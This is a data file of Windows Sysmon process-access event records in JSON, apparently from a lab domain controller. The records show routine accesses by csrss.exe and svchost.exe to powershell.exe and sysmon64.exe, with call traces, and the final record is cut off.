{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5317,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.525\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D2-5F25-0000-0010C9BE0700}\r\nTargetProcessId: 1044\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.525","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D2-5F25-0000-0010C9BE0700}","TargetProcessId":"1044","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5318,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5319,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5320,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5321,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5322,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5323,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5324,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5325,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 